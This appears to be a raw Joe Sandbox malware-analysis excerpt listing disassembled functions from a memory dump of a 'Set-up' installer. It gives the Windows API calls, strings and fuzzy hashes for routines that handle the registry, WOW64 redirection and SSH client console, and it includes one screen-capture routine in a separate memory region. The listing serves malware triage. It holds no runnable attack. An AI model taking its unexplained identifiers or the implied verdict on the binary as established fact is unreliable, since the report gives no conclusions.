                                                                                                                                  • String ID: !af_$!af_ && i<s_$datavect<struct ActCodeKeyInfo *>::operator []$datavect<struct ActCodeKeyInfo *>::size$ncvector<struct ActCodeKeyInfo>::operator []
                                                                                                                                  • API String ID: 4153817207-2240726133
                                                                                                                                  • Opcode ID: 6757a1bab9ca8e7692388d3314849d4399e8a6d947868f1e3a03e4a3b6ce4b74
                                                                                                                                  • Instruction ID: a31a55475ce049677e7b5d63bddb5f9c00efe4c79d90dc205b9f8380a8b75da3
                                                                                                                                  • Opcode Fuzzy Hash: 6757a1bab9ca8e7692388d3314849d4399e8a6d947868f1e3a03e4a3b6ce4b74
                                                                                                                                  • Instruction Fuzzy Hash: E9C129B4900269DFDB64CF58CD94B9EBBB8AF44305F0040E9D649A7282DB746E88CF65
                                                                                                                                  APIs
                                                                                                                                  • RegSetValueExW.ADVAPI32(?,00000000,00000000,?,?,?,00000004,00000000), ref: 00E6F5BE
                                                                                                                                  • RegDeleteValueW.ADVAPI32(?,00000000,?,?,00000000,00000002,00000000,00000000,?,460C02D8,?,?), ref: 00E6F6EA
                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00E6F73F
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Value$DeleteException@8Throw
                                                                                                                                  • String ID: NumCast$RegDeleteValueW()$RegSetValueExW()$value >= 0
                                                                                                                                  • API String ID: 2269677152-3701542799
                                                                                                                                  • Opcode ID: b7b71aec19089772a49d198dcae6e1c79b20a78bd6ccb3249278958b68334c3a
                                                                                                                                  • Instruction ID: 658a7d3ce0293ad6c6f7b120acfa8b1eb6e926152b45b1194a1eea78fb0c8f4f
                                                                                                                                  • Opcode Fuzzy Hash: b7b71aec19089772a49d198dcae6e1c79b20a78bd6ccb3249278958b68334c3a
                                                                                                                                  • Instruction Fuzzy Hash: CF61CC70A00249EFDF14DFA4E945BAEBBF5FF44714F104169E815BB281DB756A08CB90
                                                                                                                                  APIs
                                                                                                                                  • WaitForSingleObject.KERNEL32(?,460C02D8,460C02D8), ref: 00E5188F
                                                                                                                                  Strings
                                                                                                                                  • WaitForSingleObject() returned unexpected result 0x, xrefs: 00E51933
                                                                                                                                  • WaitForSingleObject(), xrefs: 00E518EC
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ObjectSingleWait
                                                                                                                                  • String ID: WaitForSingleObject()$WaitForSingleObject() returned unexpected result 0x
                                                                                                                                  • API String ID: 24740636-4160024324
                                                                                                                                  • Opcode ID: 5f97169703a41eb6cc18e5379c54b59a26902148c525dcfaab8a820bcbb931b6
                                                                                                                                  • Instruction ID: 0479e4cbcda67e23b05787c4fccc0b35e686dd008f8ce78de5b40401958bdfb4
                                                                                                                                  • Opcode Fuzzy Hash: 5f97169703a41eb6cc18e5379c54b59a26902148c525dcfaab8a820bcbb931b6
                                                                                                                                  • Instruction Fuzzy Hash: 02310871D04248AFDB24EB64EC06FDDBBA8FB05724F0049AEF815A3681EB7569488791
                                                                                                                                  APIs
                                                                                                                                  • SetLastError.KERNEL32(00000057,00000074), ref: 00E4EDAC
                                                                                                                                  • GetLastError.KERNEL32(00000000,00000054,00000074), ref: 00E4EDC5
                                                                                                                                  • GetModuleHandleA.KERNEL32(kernel32.dll,IsWow64Process), ref: 00E4EDD7
                                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 00E4EDDE
                                                                                                                                  • SetLastError.KERNEL32(00000000), ref: 00E4EDE7
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLast$AddressHandleModuleProc
                                                                                                                                  • String ID: IsWow64Process$kernel32.dll
                                                                                                                                  • API String ID: 1762409328-3024904723
                                                                                                                                  • Opcode ID: bd5eebe30d40b31a8bbe06fc9a0bf42a1fd1484917d732f0c63e368c8dc3eaac
                                                                                                                                  • Instruction ID: 3eac01c81749142ff8d3d01d6793948f533884b87987b5c2ea07b5f50b5e6cc0
                                                                                                                                  • Opcode Fuzzy Hash: bd5eebe30d40b31a8bbe06fc9a0bf42a1fd1484917d732f0c63e368c8dc3eaac
                                                                                                                                  • Instruction Fuzzy Hash: 99010431B002089BCB18AFB8FC99A6EF7B8EF48215F0005BEE81AD3344CE7169548780
                                                                                                                                  APIs
                                                                                                                                  • InitializeCriticalSection.KERNEL32(00000008,00000000,460C02D8,00000000), ref: 00F059A9
                                                                                                                                  • InitializeCriticalSection.KERNEL32(00000020), ref: 00F059BD
                                                                                                                                  • GetModuleHandleW.KERNEL32(kernel32.dll,GetSystemTimePreciseAsFileTime), ref: 00F059F1
                                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 00F059F8
                                                                                                                                  • GetSystemTimeAsFileTime.KERNEL32(00000048), ref: 00F05A09
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CriticalInitializeSectionTime$AddressFileHandleModuleProcSystem
                                                                                                                                  • String ID: GetSystemTimePreciseAsFileTime$kernel32.dll
                                                                                                                                  • API String ID: 1056315814-706389432
                                                                                                                                  • Opcode ID: 56783fecd0e8bd22f0d9b62368a4370ef1681f45517fd03d7aa7b132e6b6d1b8
                                                                                                                                  • Instruction ID: 63d74925a4e6c6f7d7b616566d91745d88bef51eb7097b1cd5ffbe437372436e
                                                                                                                                  • Opcode Fuzzy Hash: 56783fecd0e8bd22f0d9b62368a4370ef1681f45517fd03d7aa7b132e6b6d1b8
                                                                                                                                  • Instruction Fuzzy Hash: 72218EB1900705EBC724DF69D848B8ABBF8FB09724F10466EE45193A80D7B9B544CB90
                                                                                                                                  APIs
                                                                                                                                  • GetLastError.KERNEL32(?,0131A978,?,00000000,?,00E4E2F9,00000107,?,?,00000000), ref: 00E4EE43
                                                                                                                                  • GetModuleHandleA.KERNEL32(kernel32.dll,GetSystemWow64DirectoryW,?,0131A978,?,00000000,?,00E4E2F9,00000107,?,?,00000000), ref: 00E4EE55
                                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 00E4EE5C
                                                                                                                                  • SetLastError.KERNEL32(00000000,?,0131A978,?,00000000,?,00E4E2F9,00000107,?,?,00000000), ref: 00E4EE65
                                                                                                                                  • SetLastError.KERNEL32(00000078,?,0131A978,?,00000000,?,00E4E2F9,00000107,?,?,00000000), ref: 00E4EE92
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLast$AddressHandleModuleProc
                                                                                                                                  • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                                                                                                                  • API String ID: 1762409328-1816364905
                                                                                                                                  • Opcode ID: 5aa286ddc7694777170956711e5283dae502fde13326480726cb0b8bda5ba57a
                                                                                                                                  • Instruction ID: 5376320bcf25485a30d54a14c6c215310dc5c4459facb7e6ed84c8feb132fa67
                                                                                                                                  • Opcode Fuzzy Hash: 5aa286ddc7694777170956711e5283dae502fde13326480726cb0b8bda5ba57a
                                                                                                                                  • Instruction Fuzzy Hash: FEF0F97175020867C718ABB9BC9996EF7E9EB8821170105BEF51AC3244CE7568048790
                                                                                                                                  APIs
                                                                                                                                  • GetLastError.KERNEL32 ref: 00E4EEC3
                                                                                                                                  • GetModuleHandleA.KERNEL32(kernel32.dll,Wow64DisableWow64FsRedirection), ref: 00E4EED5
                                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 00E4EEDC
                                                                                                                                  • SetLastError.KERNEL32(00000000), ref: 00E4EEE5
                                                                                                                                  • SetLastError.KERNEL32(00000078), ref: 00E4EF0D
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLast$AddressHandleModuleProc
                                                                                                                                  • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                                                                                  • API String ID: 1762409328-3689287502
                                                                                                                                  • Opcode ID: bf8ba8b68b9770080861920b46cef14cd2328cae7f691aac80aab303fe87064c
                                                                                                                                  • Instruction ID: 0f3b7fb8a6d26068d7b52d9aa0df206dc2830c7755f328e92fa02c0bfd7b1be3
                                                                                                                                  • Opcode Fuzzy Hash: bf8ba8b68b9770080861920b46cef14cd2328cae7f691aac80aab303fe87064c
                                                                                                                                  • Instruction Fuzzy Hash: 9CF0A93575420897C72CABB9BC9987EB7A9EB8921170105BEF51AC3244CE7568048790
                                                                                                                                  APIs
                                                                                                                                  • GetLastError.KERNEL32 ref: 00E4EF43
                                                                                                                                  • GetModuleHandleA.KERNEL32(kernel32.dll,Wow64RevertWow64FsRedirection), ref: 00E4EF55
                                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 00E4EF5C
                                                                                                                                  • SetLastError.KERNEL32(00000000), ref: 00E4EF65
                                                                                                                                  • SetLastError.KERNEL32(00000078), ref: 00E4EF8D
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLast$AddressHandleModuleProc
                                                                                                                                  • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                                                                                  • API String ID: 1762409328-1355242751
                                                                                                                                  • Opcode ID: 94450ac512f450fbd8fe0ac61debe457c26c6b05db9cd76f1963e26a1eaa4443
                                                                                                                                  • Instruction ID: 14647e6994c73c56f27857b6d258df496be8585eaa1fa08822ae8fd85f13d862
                                                                                                                                  • Opcode Fuzzy Hash: 94450ac512f450fbd8fe0ac61debe457c26c6b05db9cd76f1963e26a1eaa4443
                                                                                                                                  • Instruction Fuzzy Hash: CCF0A935754108A7C728ABB9BC9996EB7A9EB8921170105BEF516C3244DE756C048790
                                                                                                                                  APIs
                                                                                                                                  • EnterCriticalSection.KERNEL32(00000008,460C02D8,00000000), ref: 00F05A92
                                                                                                                                  • GetSystemTimeAsFileTime.KERNEL32(?), ref: 00F05AA7
                                                                                                                                  • __aulldiv.LIBCMT ref: 00F05ABF
                                                                                                                                  • __aulldiv.LIBCMT ref: 00F05AED
                                                                                                                                  • __aulldiv.LIBCMT ref: 00F05B0A
                                                                                                                                  • __aulldiv.LIBCMT ref: 00F05B56
                                                                                                                                  • LeaveCriticalSection.KERNEL32(00000008,00000000,?,000F4240,00000000,00000000,?,000F4240,00000000,?,?,000F4240,00000000,00000000,?,000F4240), ref: 00F05B8E
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: __aulldiv$CriticalSectionTime$EnterFileLeaveSystem
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3016372432-0
                                                                                                                                  • Opcode ID: 17df7d3b768bc60d29cd3d1465b9eb8eae0aa4ea327ac9ed165e24c52369b250
                                                                                                                                  • Instruction ID: f94392043b53f3fa704769be7aed4b65e77e024ac43dca0cb3dfff5e962caf07
                                                                                                                                  • Opcode Fuzzy Hash: 17df7d3b768bc60d29cd3d1465b9eb8eae0aa4ea327ac9ed165e24c52369b250
                                                                                                                                  • Instruction Fuzzy Hash: F841C5B1E00219ABCB18DF68CC85FAFBBB9EB84B10F104125E914B7284D7B5AD40DB94
                                                                                                                                  APIs
                                                                                                                                  • SetLastError.KERNEL32(000000EA,00000000,00000000,?,00000000,?,00E44955,0131A976,00000000,00000000,00000000,?,00000000,01217A7C,?,00000000), ref: 00E49F35
                                                                                                                                    • Part of subcall function 00E4A3C0: SetLastError.KERNEL32(0000000E,00000001,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,01217A7C,?,00000000,, function ',0000000C), ref: 00E4A7B7
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLast
                                                                                                                                  • String ID: NumCast$value >= 0
                                                                                                                                  • API String ID: 1452528299-661659576
                                                                                                                                  • Opcode ID: 332cf6126219107996983232f0576fef0d3fccb596d0d2fc18dac0b5c7fc319f
                                                                                                                                  • Instruction ID: c259f20a575aeb820dd19a237d5f6d0e30f077d608baa413cc591f783827d776
                                                                                                                                  • Opcode Fuzzy Hash: 332cf6126219107996983232f0576fef0d3fccb596d0d2fc18dac0b5c7fc319f
                                                                                                                                  • Instruction Fuzzy Hash: 8A3112717002016BDB289F25FC89ABFB798EF88365F005169FD19F6281DB31A85497A2
                                                                                                                                  APIs
                                                                                                                                  • GetDC.USER32(00000000), ref: 05911E59
                                                                                                                                  • GetCurrentObject.GDI32(00000000,00000007), ref: 05911E7C
                                                                                                                                  • GetObjectW.GDI32(00000000,00000018,?), ref: 05911E8C
                                                                                                                                  • DeleteObject.GDI32(00000000), ref: 05911E9B
                                                                                                                                  • CreateCompatibleDC.GDI32(00000000), ref: 05911EA2
                                                                                                                                  • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 05911EAD
                                                                                                                                  • SelectObject.GDI32(00000000,00000000), ref: 05911EB9
                                                                                                                                  • BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,00CC0020), ref: 05911EDC
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2074582672.00000000058E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 058E1000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_58e1000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Object$CompatibleCreate$BitmapCurrentDeleteSelect
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2843486406-0
                                                                                                                                  • Opcode ID: 75904c5ecccf8034ddd51dec602bbfc3d54b646d39eda5a96e6469d057050a6c
                                                                                                                                  • Instruction ID: 78e98c91639c0497d9cbb0dbbbed524a64e2f63fa6e223df81d5a514f370f746
                                                                                                                                  • Opcode Fuzzy Hash: 75904c5ecccf8034ddd51dec602bbfc3d54b646d39eda5a96e6469d057050a6c
                                                                                                                                  • Instruction Fuzzy Hash: 9821AF75158308AFD7209F21DC4AB6F7EA8EB99700F000519FA5992250DB7499058F62
                                                                                                                                  APIs
                                                                                                                                  • FoldStringW.KERNEL32(000000B0,?,?,00000000,00000000,460C02D8), ref: 00F0D661
                                                                                                                                  • FoldStringW.KERNEL32(000000B0,?,?,00000000,00000000,00000000), ref: 00F0D6C0
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 00F0D90F
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FoldString$Concurrency::cancel_current_task
                                                                                                                                  • String ID: Fold$in.n < NCINT_MAX
                                                                                                                                  • API String ID: 2785977467-429990129
                                                                                                                                  • Opcode ID: 781e2d4d8706616ec5a24501ebc9aae03eaf6d193faa62ef7a10d195430cdf5d
                                                                                                                                  • Instruction ID: c383a5dd8a53122e082e5669ba921e01c31132b5f29cf1382e06848733fded4d
                                                                                                                                  • Opcode Fuzzy Hash: 781e2d4d8706616ec5a24501ebc9aae03eaf6d193faa62ef7a10d195430cdf5d
                                                                                                                                  • Instruction Fuzzy Hash: F70215B5E002099FDF14CFA8C894BEEBBF5BF04314F148169E815AB281D775AA44EF90
                                                                                                                                  APIs
                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00E56EDE
                                                                                                                                    • Part of subcall function 0111AB60: RaiseException.KERNEL32(?,?,?,00E3A2DC,0131B928,0131B928,?,?,?,?,?,?,00E3A2DC,0131B928,01302F74,0131B928), ref: 0111ABBF
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ExceptionException@8RaiseThrow
                                                                                                                                  • String ID: parameter value; expecting 'y', 'n', or 'd'.$Invalid -$def$default$yes
                                                                                                                                  • API String ID: 3976011213-182719399
                                                                                                                                  • Opcode ID: 04cffa85de01eccb66ba9de660b194d25f0bd04bea791fe96c7da63075e3ad2e
                                                                                                                                  • Instruction ID: f147818e0b8495f399cd7d7d4b833c783de227be79d0b15e9e5edcdce1da7cbd
                                                                                                                                  • Opcode Fuzzy Hash: 04cffa85de01eccb66ba9de660b194d25f0bd04bea791fe96c7da63075e3ad2e
                                                                                                                                  • Instruction Fuzzy Hash: 92919BB5E002089BDF10DFA4D945BEEBBF8EF15319F508459EC14B7281DB76AA09CB60
                                                                                                                                  APIs
                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00E3BF48
                                                                                                                                  Strings
                                                                                                                                  • Use -ignoreUpgradeAccess to install this version anyway., xrefs: 00E3BF01
                                                                                                                                  • Update failed: , xrefs: 00E3BF5D
                                                                                                                                  • `anonymous-namespace'::HandleResultFailure, xrefs: 00E3BFC8
                                                                                                                                  • A log file for this update is stored in directory:, xrefs: 00E3BF89
                                                                                                                                  • result.Get() && result->IsFailure(), xrefs: 00E3BFCD
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Exception@8Throw
                                                                                                                                  • String ID: A log file for this update is stored in directory:$Use -ignoreUpgradeAccess to install this version anyway.$Update failed: $`anonymous-namespace'::HandleResultFailure$result.Get() && result->IsFailure()
                                                                                                                                  • API String ID: 2005118841-1237414699
                                                                                                                                  • Opcode ID: 56b7103d206d4384ece1b491bedb98dffedce62f3f1d78c7f0a80a11411a47aa
                                                                                                                                  • Instruction ID: f9539cc9e4a81b0adb0532eaa1ad31c5c20445a21171a0ef1b03ea97fc0ff02c
                                                                                                                                  • Opcode Fuzzy Hash: 56b7103d206d4384ece1b491bedb98dffedce62f3f1d78c7f0a80a11411a47aa
                                                                                                                                  • Instruction Fuzzy Hash: B151A171E04248EBCB14DFA4D94ABEEBBF8AF04304F144169F505B7281EB75AE08CB91
                                                                                                                                  APIs
                                                                                                                                  • GetConsoleTitleW.KERNEL32(00000000,00000000,00000081,,?,460C02D8), ref: 00E51C95
                                                                                                                                  • GetLastError.KERNEL32 ref: 00E51CA1
                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00E51D7B
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 00E51D82
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Concurrency::cancel_current_taskConsoleErrorException@8LastThrowTitle
                                                                                                                                  • String ID: GetConsoleTitleW()$
                                                                                                                                  • API String ID: 3428956699-626820007
                                                                                                                                  • Opcode ID: 1655a7a539b063e8d127ce3d4be1fee923e508d335daa9388c89119f34b909af
                                                                                                                                  • Instruction ID: c81ddd32f750868c1450e24510bc57039a75525639f5684ecfe5dac085c86325
                                                                                                                                  • Opcode Fuzzy Hash: 1655a7a539b063e8d127ce3d4be1fee923e508d335daa9388c89119f34b909af
                                                                                                                                  • Instruction Fuzzy Hash: 7051D2706002059BDF28DB24C855BBEB7F9AF40746F10595DE816F72C0EBB5A988CB91
                                                                                                                                  APIs
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 00E53398
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Concurrency::cancel_current_task
                                                                                                                                  • String ID: !af_$!af_ && length()$basic_ncstring<wchar_t>::back$datavect<struct SeqPtr<wchar_t> >::begin$datavect<struct SeqPtr<wchar_t> >::size
                                                                                                                                  • API String ID: 118556049-2988572226
                                                                                                                                  • Opcode ID: 9bdc1877c96bb4121ed18571be676779931fbf3f330e9ed93fff5dea5d095843
                                                                                                                                  • Instruction ID: 83de0fc8b82b9f1a80a279c5fb8519d097bf51c7c25050f9d0cd922a184a543c
                                                                                                                                  • Opcode Fuzzy Hash: 9bdc1877c96bb4121ed18571be676779931fbf3f330e9ed93fff5dea5d095843
                                                                                                                                  • Instruction Fuzzy Hash: 2F411170A00201DBDF25DF69C881B6AB7F5EB84755F149A2CE925772C1C7B1AE48CB90
                                                                                                                                  APIs
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 00E8D50C
                                                                                                                                    • Part of subcall function 00E3A2C0: __CxxThrowException@8.LIBVCRUNTIME ref: 00E3A2D7
                                                                                                                                    • Part of subcall function 00E3A2C0: ___std_exception_copy.LIBVCRUNTIME ref: 00E3A321
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Concurrency::cancel_current_taskException@8Throw___std_exception_copy
                                                                                                                                  • String ID: !!p$!af_$!af_ && i<s_$datavect<unsigned long *>::at$ncvector<unsigned long>::attach_back
                                                                                                                                  • API String ID: 2281437974-3312955937
                                                                                                                                  • Opcode ID: ea808afeffe2367e95cf92514f0b6b51a44b5c24066a48ffb64718c21a6c7efb
                                                                                                                                  • Instruction ID: 42cd9e127180edd17070e07636d5cbc0511d18dfe5d01062683bb4008a6e0a18
                                                                                                                                  • Opcode Fuzzy Hash: ea808afeffe2367e95cf92514f0b6b51a44b5c24066a48ffb64718c21a6c7efb
                                                                                                                                  • Instruction Fuzzy Hash: C041D171A44704EFCB20EF49D841B5AFBF4EB45728F10466EE819A77C0D771A940CB90
                                                                                                                                  APIs
                                                                                                                                  • EnterCriticalSection.KERNEL32(0131B8F8,460C02D8), ref: 00E61DAA
                                                                                                                                  • LeaveCriticalSection.KERNEL32(0131B8F8), ref: 00E61F37
                                                                                                                                    • Part of subcall function 00E5EE70: GetConsoleScreenBufferInfo.KERNEL32(?,?,?,?,?,00E5F001,?,?), ref: 00E5EE9D
                                                                                                                                  Strings
                                                                                                                                  • !af_, xrefs: 00E61EDD, 00E61F05
                                                                                                                                  • datavect<struct SshClient::BvConsole::CaptureEntry *>::operator [], xrefs: 00E61EEC
                                                                                                                                  • ncvector<struct SshClient::BvConsole::CaptureEntry>::operator [], xrefs: 00E61F00
                                                                                                                                  • datavect<struct SshClient::BvConsole::CaptureEntry *>::size, xrefs: 00E61ED8
                                                                                                                                  • !af_ && i<s_, xrefs: 00E61EF1
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CriticalSection$BufferConsoleEnterInfoLeaveScreen
                                                                                                                                  • String ID: !af_$!af_ && i<s_$datavect<struct SshClient::BvConsole::CaptureEntry *>::operator []$datavect<struct SshClient::BvConsole::CaptureEntry *>::size$ncvector<struct SshClient::BvConsole::CaptureEntry>::operator []
                                                                                                                                  • API String ID: 2027140841-2732337431
                                                                                                                                  • Opcode ID: 7d1322ad2058ed147faaa1c9bce2d97e1cbf0e0b454beca41613ae8076379b6d
                                                                                                                                  • Instruction ID: 7087b49940e0578b3903b96074952e316ea5909835f8af88db2422bf993e6d9c
                                                                                                                                  • Opcode Fuzzy Hash: 7d1322ad2058ed147faaa1c9bce2d97e1cbf0e0b454beca41613ae8076379b6d
                                                                                                                                  • Instruction Fuzzy Hash: 15416431A81284DFCB36CB54F845B69F7B9EB15398F08219AEC1077289C771EA45C7A1
                                                                                                                                  APIs
                                                                                                                                  • GetFullPathNameW.KERNEL32(?,00000000,00000000,00000000,460C02D8,00000000), ref: 00E51F64
                                                                                                                                  • GetLastError.KERNEL32(00000001,?,00000000,00000000,00000000,00000001,?,?,?,00000000,00000000,00000000,460C02D8,00000000), ref: 00E51F72
                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00E51FA1
                                                                                                                                    • Part of subcall function 0111AB60: RaiseException.KERNEL32(?,?,?,00E3A2DC,0131B928,0131B928,?,?,?,?,?,?,00E3A2DC,0131B928,01302F74,0131B928), ref: 0111ABBF
                                                                                                                                  • GetFullPathNameW.KERNEL32(?,00000000,00000000,00000000,00000001,?,?,?,00000000,00000000,00000000,460C02D8,00000000), ref: 00E5202F
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 00E52066
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FullNamePath$Concurrency::cancel_current_taskErrorExceptionException@8LastRaiseThrow
                                                                                                                                  • String ID: GetFullPathName()
                                                                                                                                  • API String ID: 1515775718-2043017871
                                                                                                                                  • Opcode ID: eb17545ae7ce698bf05b42954f238041379b34034711e30cb7401d6c4812569b
                                                                                                                                  • Instruction ID: 396421e3f25647f91eb5ec179e439a0925de04e8eb47cca8253ddab84cf73d67
                                                                                                                                  • Opcode Fuzzy Hash: eb17545ae7ce698bf05b42954f238041379b34034711e30cb7401d6c4812569b
                                                                                                                                  • Instruction Fuzzy Hash: 33312471600205ABCB24EF64CC41B6FB7F8EF84744F10492DF915A32C0DBB4A848CB90
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00E63B10: EnterCriticalSection.KERNEL32(0131BA1C,460C02D8,?,?,?,?,?,00000000,011679C8,000000FF,?,00E62830,00000001,00000011,460C02D8,00002510), ref: 00E63B81
                                                                                                                                    • Part of subcall function 00E63B10: LeaveCriticalSection.KERNEL32(0131BA1C,?,?,?,?,?,00000000,011679C8,000000FF,?,00E62830,00000001,00000011,460C02D8,00002510,0000250C), ref: 00E63BD5
                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00E6284D
